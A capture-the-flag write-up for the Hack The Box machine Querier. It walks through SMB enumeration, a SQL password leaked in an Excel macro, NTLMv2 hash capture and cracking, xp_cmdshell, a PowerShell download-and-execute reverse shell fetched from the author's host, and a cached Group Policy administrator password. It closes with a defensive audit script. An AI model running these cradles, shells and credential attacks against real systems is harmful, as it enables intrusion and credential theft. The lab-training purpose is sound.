This is the write-up for the box Querier, which was retired on 22 June 2019. My IP address was 10.10.14.13 while I did this.
Let's put this in our hosts file:
10.10.10.125 querier.htb
Starting with an Nmap scan:
nmap -sC -sV -o nmap/querier.nmap 10.10.10.125
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
1433/tcp open ms-sql-s Microsoft SQL Server 2017 14.00.1000.00; RTM
| ms-sql-ntlm-info:
| Target_Name: HTB
| NetBIOS_Domain_Name: HTB
| NetBIOS_Computer_Name: QUERIER
| DNS_Domain_Name: HTB.LOCAL
| DNS_Computer_Name: QUERIER.HTB.LOCAL
| DNS_Tree_Name: HTB.LOCAL
|_ Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2019-11-03T12:21:00
|_Not valid after: 2049-11-03T12:21:00
|_ssl-date: 2019-11-03T12:22:33+00:00; +3s from scanner time.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Scanning all ports:
nmap -p- -o nmap/alports_querier.nmap 10.10.10.125
PORT STATE SERVICE
(...)
5985/tcp open wsman
47001/tcp open winrm
(...)
Enumerating the SMB shares we get some interesting information:
smbmap -H 10.10.10.125 -u anyone
Disk Permissions
---- -----------
ADMIN$ NO ACCESS
C$ NO ACCESS
IPC$ READ ONLY
Reports READ ONLY
We have read permissions on the Reports share. Connecting to it, we can download the files:
smbclient -N //10.10.10.125/Reports
There is one file, Currency Volume Report.xlsm, which is an Excel workbook. We will analyze it with oletools, a toolkit built to analyze OLE and MS Office files; it can be installed from the Kali repositories or from GitHub.
olevba "Currency Volume Report.xlsm"
This finds a macro in the workbook that runs automatically when it is opened, with the following code:
Private Sub Connect()
    Dim conn As ADODB.Connection
    Dim rs As ADODB.Recordset
    Set conn = New ADODB.Connection
    conn.ConnectionString = "Driver={SQL Server};Server=QUERIER;Trusted_Connection=no;Database=volume;Uid=reporting;Pwd=PcwTWTHRwryjc$c6"
    conn.ConnectionTimeout = 10
    conn.Open
    If conn.State = adStateOpen Then
        ' MsgBox "connection successful"
        'Set rs = conn.Execute("SELECT * @@version;")
        Set rs = conn.Execute("SELECT * FROM volume;")
        Sheets(1).Range("A1").CopyFromRecordset rs
        rs.Close
    End If
End Sub
This code contains the user ID reporting and the password PcwTWTHRwryjc$c6 for the SQL Server.
Now that we have credentials, we try them against the SQL Server instance. For the connection we use the mssqlclient.py script from the Impacket framework:
./mssqlclient.py reporting@10.10.10.125 -windows-auth
After entering the password we get in and can use the commands Impacket provides. The enable_xp_cmdshell command would give us command execution, but it fails because this user lacks the required permission. Instead we capture the NTLMv2 hash of the SQL Server service account with Responder:
responder -I tun0
Now, from the SQL Server, we need to trigger an authentication to our machine:
xp_dirtree "\\10.10.14.13\Test\"
And we get the hash of the user mssql-svc:
[SMB] NTLMv2-SSP Client : 10.10.10.125
[SMB] NTLMv2-SSP Username : QUERIER\mssql-svc
[SMB] NTLMv2-SSP Hash : mssql-svc::QUERIER:57cea40f4c2e712b(...)
We can try to crack this with Hashcat:
hashcat -m 5600 querier.ntlm /opt/wordlist/rockyou.txt
After a while we get the password:
corporate568
With these credentials we authenticate to the SQL Server again to see whether we have more permissions:
./mssqlclient.py mssql-svc@10.10.10.125 -windows-auth
When we execute the command enable_xp_cmdshell this time, it succeeds, and we can verify command execution by running whoami:
xp_cmdshell whoami
Since we can now execute arbitrary commands, we want a reverse shell. We will run the Invoke-PowerShellTcp.ps1 script from the Nishang framework, which I have renamed shell.ps1 and configured with my IP and port 9001:
xp_cmdshell powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.13/shell.ps1')"
Running this gives us a reverse shell on the box as the user mssql-svc.
To find privilege escalation paths, we run the enumeration script PowerUp.ps1 from the PowerSploit framework:
IEX(New-Object Net.WebClient).downloadString("http://10.10.14.13/PowerUp.ps1")
Invoke-AllChecks
This part of the output gives us interesting information:
[*] Checking for cached Group Policy Preferences .xml files....
Changed : {2019-01-28 23:12:48}
UserNames : {Administrator}
NewName : [BLANK]
Passwords : {MyUnclesAreMarioAndLuigi!!1!}
File : C:\ProgramData\Microsoft\Group Policy\History\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\Groups\Groups.xml
This gives us a password for the Administrator account, cached in a Group Policy Preferences XML file.
Let's try these credentials with psexec:
./psexec.py Administrator@10.10.10.125
Now we are NT Authority\SYSTEM on the box!
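For defenders, the lesson of the Group Policy step is that a password stored in a Group Policy Preferences item (the cpassword attribute) stays readable in SYSVOL and in the local history cache long after MS14-025, so those files should be audited and cleaned. The following audit script is an added example, not part of the original write-up or of PowerUp; it flags any preference XML that still carries a non-empty cpassword, using a constructed Groups.xml sample with a placeholder value.

```python
"""Audit Group Policy Preferences XML for cached cpassword attributes.

Constructed example added to this write-up, not the author's code. The sample
mirrors the layout of a GPP Groups.xml with a dummy cpassword value; the GPP
clsid/uid attributes are omitted.
"""
import xml.etree.ElementTree as ET
from pathlib import Path
from typing import Dict, List

# Attribute naming the account a cpassword belongs to, per preference type
# (Groups/Drives/DataSources: userName, Services: accountName, ScheduledTasks: runAs).
ACCOUNT_ATTRS = ("userName", "accountName", "runAs")

# Constructed sample; the cpassword string is a placeholder, not a real blob.
SAMPLE_GROUPS_XML = """<Groups>
  <User name="Administrator" changed="2019-01-28 23:12:48">
    <Properties action="U" newName="" cpassword="PLACEHOLDER_CPASSWORD_BLOB"
                neverExpires="1" userName="Administrator"/>
  </User>
  <User name="svc_backup" changed="2019-01-28 23:13:10">
    <Properties action="U" newName="" cpassword="" userName="svc_backup"/>
  </User>
</Groups>
"""

def find_cpasswords(xml_text: str, source: str = "<string>") -> List[Dict[str, str]]:
    """Return one finding per element that carries a non-empty cpassword."""
    root = ET.fromstring(xml_text)
    parent_of = {child: parent for parent in root.iter() for child in parent}
    findings: List[Dict[str, str]] = []
    for elem in root.iter():
        if not elem.get("cpassword"):  # absent or empty: nothing cached here
            continue
        parent = parent_of.get(elem, elem)
        account = next((elem.get(a) for a in ACCOUNT_ATTRS if elem.get(a)),
                       parent.get("name", "?"))
        findings.append({"file": source, "account": account,
                         "new_name": elem.get("newName", ""),
                         "changed": parent.get("changed", "")})
    return findings

def audit_paths(roots: List[Path]) -> List[Dict[str, str]]:
    """Audit every *.xml under the given roots, e.g. a SYSVOL Preferences tree."""
    return [f for r in roots for x in r.rglob("*.xml")
            for f in find_cpasswords(x.read_text(encoding="utf-8-sig"), str(x))]

if __name__ == "__main__":
    for hit in find_cpasswords(SAMPLE_GROUPS_XML, "Groups.xml"):
        print(f"{hit['file']}: cached password for {hit['account']} (changed {hit['changed']})")
```

Any hit means the credential should be treated as compromised, rotated, and the preference item removed (Microsoft's guidance is to use LAPS or similar for local admin passwords instead).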